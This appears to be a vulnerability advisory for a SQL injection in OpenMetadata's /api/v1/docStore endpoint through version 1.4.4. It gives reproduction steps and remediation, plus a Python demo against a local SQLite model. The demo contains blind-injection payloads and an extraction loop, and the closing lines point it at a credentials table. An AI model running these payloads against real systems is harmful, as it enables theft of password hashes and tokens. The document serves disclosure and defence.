open-metadata
cpe:2.3:a:open-metadata:openmetadata:*:*:*:*:*:*:*
- <= 1.4.4
A SQL injection vulnerability has been identified in OpenMetadata versions through 1.4.4. The flaw is in the DocStoreDAO interface, specifically in the listCount function, where the caller-supplied entityType parameter is spliced into the text of the SQL query rather than passed as a bound parameter. Because the parameter reaches the database unescaped, an attacker controls part of the WHERE clause and can use the endpoint to read data from the database.
Successful exploitation leads to unauthorized data extraction from the OpenMetadata database, including sensitive material such as password hashes and JWT tokens stored in entity records.
To reproduce this vulnerability, send a request to the OpenMetadata API endpoint '/api/v1/docStore' with a crafted entityType parameter that includes a SQL injection payload. The listCount function embeds the parameter in its query and the database executes the injected SQL. Since the endpoint only returns a row count, data is recovered by comparing the returned count against a baseline (boolean-based blind injection): a payload whose injected condition is true changes the count, so table names, column names and then column values from the 'openmetadata_db' database can be retrieved one character at a time. Once the injection is confirmed, tools such as sqlmap can automate extraction from the vulnerable columns. Remediation is to upgrade to a release later than 1.4.4; at the code level, entityType must be passed as a bound query parameter or validated against the fixed set of known entity types instead of being concatenated into the query text.
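The following is an added illustration, not OpenMetadata's own code: it models the listCount pattern described above against an in-memory SQLite database (the real deployment uses MySQL/PostgreSQL, so the metadata table would be information_schema.tables and the comment syntax differs). The table layout, row contents and the two listCount variants are constructed assumptions. It shows why a count-only endpoint is still enough for extraction: the blind loop recovers a table name character by character by watching whether the count rises above the baseline, and the same payloads do nothing against the bound-parameter version.

```python
import sqlite3
import string

# Constructed stand-in for the doc_store table; schema and rows are assumed.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE doc_store (id TEXT, entityType TEXT, name TEXT, json TEXT);
        INSERT INTO doc_store VALUES ('1', 'KnowledgePanel', 'panel-a', '{}');
        INSERT INTO doc_store VALUES ('2', 'KnowledgePanel', 'panel-b', '{}');
        INSERT INTO doc_store VALUES ('3', 'Persona', 'analyst', '{}');
        CREATE TABLE user_entity (id TEXT, json TEXT);
        INSERT INTO user_entity VALUES ('u1', '{"name": "admin"}');
    """)
    return conn

def list_count_vulnerable(conn, entity_type):
    # Models the flaw: entityType is interpolated into the SQL text,
    # so a quote in the parameter terminates the literal.
    sql = f"SELECT COUNT(*) FROM doc_store WHERE entityType = '{entity_type}'"
    return conn.execute(sql).fetchone()[0]

def list_count_fixed(conn, entity_type):
    # Hardened form: the value is bound, never parsed as SQL.
    sql = "SELECT COUNT(*) FROM doc_store WHERE entityType = ?"
    return conn.execute(sql, (entity_type,)).fetchone()[0]

def extract_table_name(count_fn, conn, index=0, max_len=32):
    """Boolean-based blind extraction of the index-th table name through
    a count endpoint. Returns "" if the injection has no effect."""
    # Baseline: an entity type that matches no row gives the 'false' count.
    baseline = count_fn(conn, "does-not-exist")
    alphabet = string.ascii_letters + string.digits + "_"
    name = ""
    for pos in range(1, max_len + 1):
        found = False
        for ch in alphabet:
            # OR'd condition is true only when the guessed character matches,
            # which makes every row match and raises the count; '-- ' swallows
            # the closing quote the original query appends.
            payload = (
                "nope' OR substr((SELECT name FROM sqlite_master WHERE type='table' "
                f"ORDER BY name LIMIT 1 OFFSET {index}),{pos},1)='{ch}' -- "
            )
            if count_fn(conn, payload) > baseline:
                name += ch
                found = True
                break
        if not found:
            break  # no character matched: end of the name (or no injection)
    return name

if __name__ == "__main__":
    conn = make_db()
    print("legit count:", list_count_vulnerable(conn, "KnowledgePanel"))
    print("tautology, vulnerable:", list_count_vulnerable(conn, "x' OR '1'='1"))
    print("tautology, fixed:", list_count_fixed(conn, "x' OR '1'='1"))
    print("blind extract, vulnerable:", extract_table_name(list_count_vulnerable, conn))
    print("blind extract, fixed:", repr(extract_table_name(list_count_fixed, conn)))
```

The loop is the manual equivalent of what sqlmap's boolean-based technique automates: one request per candidate character, with the count as the oracle. Setting index to 1 walks to the next table, and the same inner query can be pointed at user_entity to pull the JSON column that holds credentials.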